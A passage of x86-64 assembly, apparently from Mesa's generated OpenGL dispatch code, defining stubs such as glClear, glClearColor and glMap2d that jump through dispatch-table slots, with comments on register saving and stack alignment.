call _x86_64_get_dispatch@PLT
movq 1568(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1568(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1568(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1568(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RenderMode), .-GL_PREFIX(RenderMode)
/* glInitNames dispatch stub: tail-jump through dispatch-table
 * slot 197 (byte offset 1576).  No argument registers need saving;
 * the %rbp push/pop is pure stack-alignment padding for the lookup
 * call (%rbp is callee-saved, so this is harmless). */
.p2align 4,,15
.globl GL_PREFIX(InitNames)
.type GL_PREFIX(InitNames), @function
GL_PREFIX(InitNames):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1576(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 1576(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1576(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 1576(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(InitNames), .-GL_PREFIX(InitNames)
/* glLoadName dispatch stub: tail-jump through dispatch-table
 * slot 198 (byte offset 1584).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(LoadName)
.type GL_PREFIX(LoadName), @function
GL_PREFIX(LoadName):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1584(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1584(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1584(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1584(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LoadName), .-GL_PREFIX(LoadName)
/* glPassThrough dispatch stub: tail-jump through dispatch-table
 * slot 199 (byte offset 1592).  Its single argument arrives in %xmm0
 * (caller-saved), so the non-TLS paths spill its low quadword into an
 * 8-byte stack frame around the lookup call (frame size keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(PassThrough)
.type GL_PREFIX(PassThrough), @function
GL_PREFIX(PassThrough):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1592(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 1592(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1592(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 1592(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PassThrough), .-GL_PREFIX(PassThrough)
/* glPopName dispatch stub: tail-jump through dispatch-table
 * slot 200 (byte offset 1600).  No argument registers need saving;
 * the %rbp push/pop is pure stack-alignment padding for the lookup
 * call (%rbp is callee-saved, so this is harmless). */
.p2align 4,,15
.globl GL_PREFIX(PopName)
.type GL_PREFIX(PopName), @function
GL_PREFIX(PopName):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1600(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 1600(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1600(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 1600(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PopName), .-GL_PREFIX(PopName)
/* glPushName dispatch stub: tail-jump through dispatch-table
 * slot 201 (byte offset 1608).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(PushName)
.type GL_PREFIX(PushName), @function
GL_PREFIX(PushName):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1608(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1608(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1608(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1608(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PushName), .-GL_PREFIX(PushName)
/* glDrawBuffer dispatch stub: tail-jump through dispatch-table
 * slot 202 (byte offset 1616).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(DrawBuffer)
.type GL_PREFIX(DrawBuffer), @function
GL_PREFIX(DrawBuffer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1616(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1616(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1616(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1616(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DrawBuffer), .-GL_PREFIX(DrawBuffer)
/* glClear dispatch stub: tail-jump through dispatch-table
 * slot 203 (byte offset 1624).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(Clear)
.type GL_PREFIX(Clear), @function
GL_PREFIX(Clear):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1624(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1624(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1624(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1624(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Clear), .-GL_PREFIX(Clear)
/* glClearAccum dispatch stub: tail-jump through dispatch-table
 * slot 204 (byte offset 1632).  All four arguments arrive in
 * %xmm0-%xmm3 (caller-saved), so the non-TLS paths spill their low
 * quadwords into a 40-byte stack frame around the lookup call
 * (frame size keeps %rsp 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(ClearAccum)
.type GL_PREFIX(ClearAccum), @function
GL_PREFIX(ClearAccum):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1632(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 1632(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1632(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 1632(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ClearAccum), .-GL_PREFIX(ClearAccum)
/* glClearIndex dispatch stub: tail-jump through dispatch-table
 * slot 205 (byte offset 1640).  Its single argument arrives in %xmm0
 * (caller-saved), so the non-TLS paths spill its low quadword into an
 * 8-byte stack frame around the lookup call (frame size keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(ClearIndex)
.type GL_PREFIX(ClearIndex), @function
GL_PREFIX(ClearIndex):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1640(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 1640(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1640(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 1640(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ClearIndex), .-GL_PREFIX(ClearIndex)
/* glClearColor dispatch stub: tail-jump through dispatch-table
 * slot 206 (byte offset 1648).  Non-TLS paths save %rdi/%rsi/%rdx/%rcx
 * around the lookup call; the extra %rbp push is stack-alignment
 * padding (odd push count keeps %rsp 16-byte aligned, and %rbp is
 * callee-saved so the save/restore is harmless). */
.p2align 4,,15
.globl GL_PREFIX(ClearColor)
.type GL_PREFIX(ClearColor), @function
GL_PREFIX(ClearColor):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1648(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1648(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1648(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1648(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ClearColor), .-GL_PREFIX(ClearColor)
/* glClearStencil dispatch stub: tail-jump through dispatch-table
 * slot 207 (byte offset 1656).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(ClearStencil)
.type GL_PREFIX(ClearStencil), @function
GL_PREFIX(ClearStencil):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1656(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1656(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1656(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1656(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ClearStencil), .-GL_PREFIX(ClearStencil)
/* glClearDepth dispatch stub: tail-jump through dispatch-table
 * slot 208 (byte offset 1664).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(ClearDepth)
.type GL_PREFIX(ClearDepth), @function
GL_PREFIX(ClearDepth):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1664(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1664(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1664(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1664(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ClearDepth), .-GL_PREFIX(ClearDepth)
/* glStencilMask dispatch stub: tail-jump through dispatch-table
 * slot 209 (byte offset 1672).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(StencilMask)
.type GL_PREFIX(StencilMask), @function
GL_PREFIX(StencilMask):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1672(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1672(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1672(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1672(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(StencilMask), .-GL_PREFIX(StencilMask)
/* glColorMask dispatch stub: tail-jump through dispatch-table
 * slot 210 (byte offset 1680).  Non-TLS paths save %rdi/%rsi/%rdx/%rcx
 * around the lookup call; the extra %rbp push is stack-alignment
 * padding (odd push count keeps %rsp 16-byte aligned, and %rbp is
 * callee-saved so the save/restore is harmless). */
.p2align 4,,15
.globl GL_PREFIX(ColorMask)
.type GL_PREFIX(ColorMask), @function
GL_PREFIX(ColorMask):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1680(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1680(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1680(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1680(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorMask), .-GL_PREFIX(ColorMask)
/* glDepthMask dispatch stub: tail-jump through dispatch-table
 * slot 211 (byte offset 1688).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(DepthMask)
.type GL_PREFIX(DepthMask), @function
GL_PREFIX(DepthMask):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1688(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1688(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1688(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1688(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DepthMask), .-GL_PREFIX(DepthMask)
/* glIndexMask dispatch stub: tail-jump through dispatch-table
 * slot 212 (byte offset 1696).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(IndexMask)
.type GL_PREFIX(IndexMask), @function
GL_PREFIX(IndexMask):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1696(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1696(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1696(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1696(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IndexMask), .-GL_PREFIX(IndexMask)
/* glAccum dispatch stub: tail-jump through dispatch-table slot 213
 * (byte offset 1704).  One argument arrives in %xmm0, so the non-TLS
 * paths spill %rdi and the low quadword of %xmm0 into a 24-byte stack
 * frame around the lookup call (the 8 spare bytes keep %rsp 16-byte
 * aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(Accum)
.type GL_PREFIX(Accum), @function
GL_PREFIX(Accum):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1704(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1704(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1704(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1704(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Accum), .-GL_PREFIX(Accum)
/* glDisable dispatch stub: tail-jump through dispatch-table
 * slot 214 (byte offset 1712).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(Disable)
.type GL_PREFIX(Disable), @function
GL_PREFIX(Disable):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1712(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1712(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1712(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1712(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Disable), .-GL_PREFIX(Disable)
/* glEnable dispatch stub: tail-jump through dispatch-table
 * slot 215 (byte offset 1720).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(Enable)
.type GL_PREFIX(Enable), @function
GL_PREFIX(Enable):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1720(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1720(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1720(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1720(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Enable), .-GL_PREFIX(Enable)
/* glFinish dispatch stub: tail-jump through dispatch-table
 * slot 216 (byte offset 1728).  No argument registers need saving;
 * the %rbp push/pop is pure stack-alignment padding for the lookup
 * call (%rbp is callee-saved, so this is harmless). */
.p2align 4,,15
.globl GL_PREFIX(Finish)
.type GL_PREFIX(Finish), @function
GL_PREFIX(Finish):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1728(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 1728(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1728(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 1728(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Finish), .-GL_PREFIX(Finish)
/* glFlush dispatch stub: tail-jump through dispatch-table
 * slot 217 (byte offset 1736).  No argument registers need saving;
 * the %rbp push/pop is pure stack-alignment padding for the lookup
 * call (%rbp is callee-saved, so this is harmless). */
.p2align 4,,15
.globl GL_PREFIX(Flush)
.type GL_PREFIX(Flush), @function
GL_PREFIX(Flush):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1736(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 1736(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1736(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 1736(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Flush), .-GL_PREFIX(Flush)
/* glPopAttrib dispatch stub: tail-jump through dispatch-table
 * slot 218 (byte offset 1744).  No argument registers need saving;
 * the %rbp push/pop is pure stack-alignment padding for the lookup
 * call (%rbp is callee-saved, so this is harmless). */
.p2align 4,,15
.globl GL_PREFIX(PopAttrib)
.type GL_PREFIX(PopAttrib), @function
GL_PREFIX(PopAttrib):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1744(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 1744(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1744(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 1744(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PopAttrib), .-GL_PREFIX(PopAttrib)
/* glPushAttrib dispatch stub: tail-jump through dispatch-table
 * slot 219 (byte offset 1752).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(PushAttrib)
.type GL_PREFIX(PushAttrib), @function
GL_PREFIX(PushAttrib):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1752(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1752(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1752(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1752(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PushAttrib), .-GL_PREFIX(PushAttrib)
/* glMap1d dispatch stub: tail-jump through dispatch-table slot 220
 * (byte offset 1760).  Arguments are split across integer and SSE
 * registers, so the non-TLS paths spill %rdi, %xmm0, %xmm1, %rsi,
 * %rdx and %rcx (low quadwords for the XMM regs) into a 56-byte
 * stack frame around the lookup call (the spare 8 bytes keep %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(Map1d)
.type GL_PREFIX(Map1d), @function
GL_PREFIX(Map1d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1760(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %rcx, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %rcx
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1760(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1760(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %rcx, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %rcx
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1760(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Map1d), .-GL_PREFIX(Map1d)
/* glMap1f dispatch stub: tail-jump through dispatch-table slot 221
 * (byte offset 1768).  Same save scheme as Map1d: %rdi, %xmm0, %xmm1,
 * %rsi, %rdx and %rcx are spilled into a 56-byte frame around the
 * lookup call (frame size keeps %rsp 16-byte aligned). */
.p2align 4,,15
.globl GL_PREFIX(Map1f)
.type GL_PREFIX(Map1f), @function
GL_PREFIX(Map1f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1768(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %rcx, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %rcx
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1768(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1768(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %rcx, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %rcx
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1768(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Map1f), .-GL_PREFIX(Map1f)
/* glMap2d dispatch stub: tail-jump through dispatch-table slot 222
 * (byte offset 1776).  Ten argument registers are live (%rdi, %xmm0,
 * %xmm1, %rsi, %rdx, %xmm2, %xmm3, %rcx, %r8, %r9), so the non-TLS
 * paths spill them all into an 88-byte stack frame around the lookup
 * call (the spare 8 bytes keep %rsp 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(Map2d)
.type GL_PREFIX(Map2d), @function
GL_PREFIX(Map2d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1776(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $88, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
movq %rcx, 56(%rsp)
movq %r8, 64(%rsp)
movq %r9, 72(%rsp)
call _x86_64_get_dispatch@PLT
movq 72(%rsp), %r9
movq 64(%rsp), %r8
movq 56(%rsp), %rcx
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $88, %rsp
movq 1776(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1776(%rax), %r11
jmp *%r11
1:
subq $88, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
movq %rcx, 56(%rsp)
movq %r8, 64(%rsp)
movq %r9, 72(%rsp)
call _glapi_get_dispatch
movq 72(%rsp), %r9
movq 64(%rsp), %r8
movq 56(%rsp), %rcx
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $88, %rsp
movq 1776(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Map2d), .-GL_PREFIX(Map2d)
/* glMap2f dispatch stub: tail-jump through dispatch-table slot 223
 * (byte offset 1784).  Same save scheme as Map2d: ten argument
 * registers spilled into an 88-byte frame around the lookup call
 * (frame size keeps %rsp 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(Map2f)
.type GL_PREFIX(Map2f), @function
GL_PREFIX(Map2f):
